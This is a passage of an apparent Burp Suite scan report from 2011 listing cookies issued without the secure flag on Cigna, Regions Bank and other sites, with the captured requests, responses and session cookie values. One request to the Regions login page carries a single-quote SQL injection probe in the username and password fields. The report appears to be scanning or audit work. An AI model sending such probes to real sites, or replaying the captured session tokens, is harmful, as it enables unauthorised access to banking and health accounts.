Set-Cookie: PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; Path=/
Content-Length: 0


5.3. https://cignaforhcp.cigna.com/wps/portal  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cignaforhcp.cigna.com
Path:   /wps/portal

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /wps/portal HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/
Cache-Control: max-age=0
Origin: https://cignaforhcp.cigna.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6
Content-Length: 0

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:31:34 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 20913
ibm-web2-location: /wps/portal/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hnd0cPE3MfAwN_ozADAyM_0-BAg9BgYwNfQ_1wkA6zeAMcwNFA388jPzdVvyA7rxwABvDatQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID_CHCP=0001qDHqEZIhYEkdLt4C0F9Adey:1DE5MNIG9P; Path=/
Set-Cookie: PD_STATEFUL_31b6dc34-289d-11e0-8e97-2054895daa77=%2Fwps; Path=/
Content-Length: 20575


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
       "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html lang="en" xmlns="http://www.w3.org/
...[SNIP]...

5.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
Origin: https://my.cigna.com
X-TeaLeaf-Page-Cui-Bytes: 1087
X-TeaLeaf-Page-Cui-Events: 2
X-TeaLeaf-Page-Dwell: 5810339
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2010.12.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: text/xml
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: BeforeUnload
X-TeaLeaf-Page-Url: /web/public/guest
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; PD_STATEFUL_cf31cef6-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme; MYCIGNA_OEP_JSESSIONID=0000yQIxVsxIeGgNdda8oLY1ni2:15ntus9ve; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=C5A87FF47FD9107F08B6A536181C0CE6; __utmz=252045595.1305563482.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/12; __utma=252045595.1041628650.1305559758.1305559758.1305563482.2; __utmc=252045595; PD_STATEFUL_e87abf76-4b84-11e0-9e32-20548964aa77=%2Fmycignatheme
Content-Length: 266

<ClientEventSet PostTimeStamp="1305565653539" ><ClientEvent Count="2" Type="PERFORMANCE" SubType="BeforeUnload" MouseMove="False" Action="No Submit" TimeDuration="5810339" DateSince1970="1305565653539
...[SNIP]...

Response

HTTP/1.1 200 OK
content-language: en-US
content-type: text/html;charset=ISO-8859-1
date: Mon, 16 May 2011 17:07:36 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
x-old-content-length: 107
surrogate-control: no-store
cache-control: no-cache="set-cookie, set-cookie2"
expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000SfgkMCJXVtjzWixM8nxmOLM:15ntus9ve; Path=/
Set-Cookie: PD_STATEFUL_2af57d96-4b85-11e0-b595-20548963aa77=%2Fmycignatheme; Path=/
Content-Length: 107

...

<html>
<body>
Response

<hr>
Read 266 bytes in 1ms.

</body>
</html>

5.5. https://my.cigna.com/web/public/forgotid  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotid

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotid HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 18768
ibm-web2-location: /web/public/forgotid/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTI4NAE30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERAL0CXJU!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6B62B67A7FD1107F1505D27393B522AB; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:24 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000swQewqb5KeLPS3KgAvdAzSA:15ngp48pp; Path=/
Set-Cookie: PD_STATEFUL_eb751ba4-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 18773


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

5.6. https://my.cigna.com/web/public/forgotpassword  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://my.cigna.com
Path:   /web/public/forgotpassword

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web/public/forgotpassword HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
content-language: en-US
content-location: https://my.cigna.com/web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
content-type: text/html; charset=UTF-8
date: Mon, 16 May 2011 15:30:28 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
vary: User-Agent,Cookie
x-old-content-length: 12125
ibm-web2-location: /web/public/forgotpassword/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3hPC18zTwtvA3cLV3NHA09H41BvM2cTIwMzI30v_aj0nPwkoMpwkF6zeAMcwNFA388jPzdVvyA7OM3RUVERABp4tfw!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
cache-control: no-cache
pragma: no-cache
expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TLTSID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/
Set-Cookie: TLTUID=6DC2518C7FD1107F16169F9E7C82FB63; Domain=.cigna.com; Path=/; Expires=Mon, 16-05-2021 15:30:28 GMT
Set-Cookie: MYCIGNA_OEP_JSESSIONID=0000xdcAV8q-uIGQr0Dq1DrPDth:15ngp45tc; Path=/
Set-Cookie: PD_STATEFUL_d1425c42-4b84-11e0-9e32-20548964aa77=%2Fweb%2Fpublic; Path=/
Content-Length: 12130


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

5.7. https://securebank.regions.com/ForgottenPassword.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /ForgottenPassword.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ForgottenPassword.aspx HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: securebank.regions.com-https=R851515607; path=/
Cache-Control: no-cache, no-store
Date: Mon, 16 May 2011 15:20:17 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=sg41ptigwefyqt55op0wstbb; path=/
Vary: Accept-Encoding
Content-Length: 15873


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HTML>
<HEAD>
       <title>Regions Online Banking</title>
       <link href="styles/styles.
...[SNIP]...

5.8. https://securebank.regions.com/login.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securebank.regions.com
Path:   /login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login.aspx?brand=regions HTTP/1.1
Host: securebank.regions.com
Connection: keep-alive
Referer: https://www.regions.com/personal_banking.rf
Cache-Control: max-age=0
Origin: https://www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 110

ignore=&locationZipCode=ZIP+Code&locationCity=City&locationState=State&googleSearch=&OnlineID=%27&Password=%27

Response

HTTP/1.1 301 Moved
Set-Cookie: securebank.regions.com-https=R812380214; path=/
Date: Mon, 16 May 2011 15:20:12 GMT
Server: Microsoft-IIS/6.0
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@amsouth.com" on "2006.10.30T12:53-0600" exp "2020.10.30T12:00-0600" r (v 0 s 0 n 0 l 0))
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: https://securebank.regions.com/SystemUnavailable.aspx?ResultCode=VALIDATIONERROR
Set-Cookie: ASP.NET_SessionId=hndv2y55u1otew45h3eaarf0; path=/
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: -1
Content-Type: text/html
Content-Length: 0


5.9. https://sso.corp.cigna.com/corp/sso/professional/controller  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://sso.corp.cigna.com
Path:   /corp/sso/professional/controller

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /corp/sso/professional/controller?command=forgotpwdbegin&PORTAL=professional&DESTINATION=https://cignaaccess.cigna.com/corp/portal/app/employer/secure/standard/MyEmployer HTTP/1.1
Host: sso.corp.cigna.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/6.0
Date: Mon, 16 May 2011 15:30:39 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTHID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Set-Cookie: TLTSID=741A6F2E7FD1107FC7C7A536181C0CE6; Path=/; Domain=.cigna.com
Content-language: en
Set-cookie: JSESSIONID=0001aplKypDyIh3-IsriGvhcHmv:13agknsul; Path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>

<head>
<title>CIGNAaccess.com - Forgotten Password - Enter User Name</title>
<link rel="ST
...[SNIP]...

5.10. https://www.paperg.com/forgot.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.paperg.com
Path:   /forgot.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forgot.php HTTP/1.1
Host: www.paperg.com
Connection: keep-alive
Referer: http://www.paperg.com/publishers/flyerboard.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=27786045.1704528150.1305557138.1305557138.1305557138.1; __utmb=27786045; __utmc=27786045; __utmz=27786045.1305557138.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 14:45:47 GMT
Server: Apache
X-Powered-By: PHP/5.3.3-7+squeeze1
P3P: CP="CAO PSA OUR"
Set-Cookie: PHPSESSID=fq6c4o1f1f4ashphj9o9s9e8j3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 3158


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Con
...[SNIP]...

5.11. https://www.planservices.com/regions/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.planservices.com
Path:   /regions/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /regions/ HTTP/1.1
Host: www.planservices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Expires: 01 Nov 1990 01:00:01 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p.xml
Set-Cookie: TESTCOOKIES=Test;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFID=52158672;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: CFTOKEN=42630575;expires=Wed, 08-May-2041 16:46:14 GMT;path=/
Set-Cookie: JSESSIONID=0430e8dac9c0442b7260TR;path=/
Set-Cookie: PLANID=;path=/
Set-Cookie: GROUPID=;path=/
Set-Cookie: IID=;path=/
Set-Cookie: WEBUSAGE=124614;path=/
Set-Cookie: USERINTERNAL=0;path=/
Set-Cookie: VIRTDIR=regions;path=/
Date: Mon, 16 May 2011 16:46:14 GMT
Connection: close


<script type="text/javascript" language="javascript">
   var str="launch,Bisys_TopFrame.cfm"; //string value to designate calls
   var urlLocation = self.location.href.toLowerCase(); //string valu
...[SNIP]...

5.12. https://www.regions.com/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.regions.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.regions.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WWW.REGIONS.COM-HTTP=R3434604483

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R939930197; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:42:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=w2u5uvedxyqp4gyfwhbipkjc; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 27843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

5.13. https://www.regions.com/personal_banking.rf  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.regions.com
Path:   /personal_banking.rf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /personal_banking.rf HTTP/1.1
Host: www.regions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WWW.REGIONS.COM-HTTP=R825062118

Response

HTTP/1.1 200 OK
Set-Cookie: WWW.REGIONS.COM-HTTPS=R3758183026; path=/
Cache-Control: private
Date: Mon, 16 May 2011 15:19:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=mgah42qkrasihqzk3dk3tq45; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 27887


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

5.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://wwwa.applyonlinenow.com
Path:   /USCCapp/Ctl/entry

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /USCCapp/Ctl/entry?directMail=true&sc=UAASWI HTTP/1.1
Host: wwwa.applyonlinenow.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 16 May 2011 15:28:15 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2
Location: https://wwwa.applyonlinenow.com/USCCapp/static/error.html?error_code=1001
Content-Length: 0
Set-Cookie: JSESSIONID=0000wkGjL9NUQ6om08aGILL54g2:-1; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1
Content-Language: en-US


5.15. https://cignaforhcp.cigna.com/ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ProviderTheme/themes/html/CignaProvider2/images/cigna/favicon.ico HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps; JSESSIONID=0000PZ1yjRG2WKh36hwOt68f6X_:15eoj2var; PD_STATEFUL_db12e020-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; TLTHID=9AB6B3A47FD1107FCBDEA536181C0CE6; PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal

Response

HTTP/1.1 200 OK
content-language: en-US
content-length: 318
content-type: text/plain
date: Mon, 16 May 2011 15:31:58 GMT
last-modified: Mon, 20 Dec 2010 18:20:32 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_32910a44-289d-11e0-8e97-2054895daa77=%2FProviderTheme; Path=/

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...

5.16. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cignaforhcp.cigna.com
Path:   /portal/images/arrowonly_gold.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/images/arrowonly_gold.gif HTTP/1.1
Host: cignaforhcp.cigna.com
Connection: keep-alive
Referer: https://cignaforhcp.cigna.com/wps/portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=252045595.1305559758.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252045595.1041628650.1305559758.1305559758.1305559758.1; __utmc=252045595; __utmb=252045595.3.10.1305559758; TLTUID=6C99367C7FD1107F0BC7BAE6BADFEE2C; TLTSID=8FB41E4C7FD1107FCA41A536181C0CE6; TLTHID=92964B127FD1107FCAD3A536181C0CE6; JSESSIONID=0000m0b58O_Mt6JKcD_nHJ5-y0C:15eoj2vv7; PD_STATEFUL_335ffd0e-289d-11e0-8e97-2054895daa77=%2Fcorp%2Fsso; JSESSIONID_CHCP=0001na8X0IINOPnLxTXec-srnIs:84FF2VLHC; PD_STATEFUL_dd717822-289d-11e0-8e97-2054895daa77=%2Fwps

Response

HTTP/1.1 200 OK
accept-ranges: bytes
content-length: 63
content-type: image/gif
date: Mon, 16 May 2011 15:35:50 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
server: IBM_HTTP_Server
Set-Cookie: PD_STATEFUL_fab19a1c-356c-11e0-b99e-2054895daa77=%2Fportal; Path=/

GIF89a.............!.......,................|..@.fm.s..a...f..;

5.17. https://my.cigna.com/mycignatheme/js/min/jsTop.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://my.cigna.com
Path:   /mycignatheme/js/min/jsTop.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mycignatheme/js/min/jsTop.js HTTP/1.1
Host: my.cigna.com
Connection: keep-alive
Referer: https://my.cigna.com/web/public/guest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
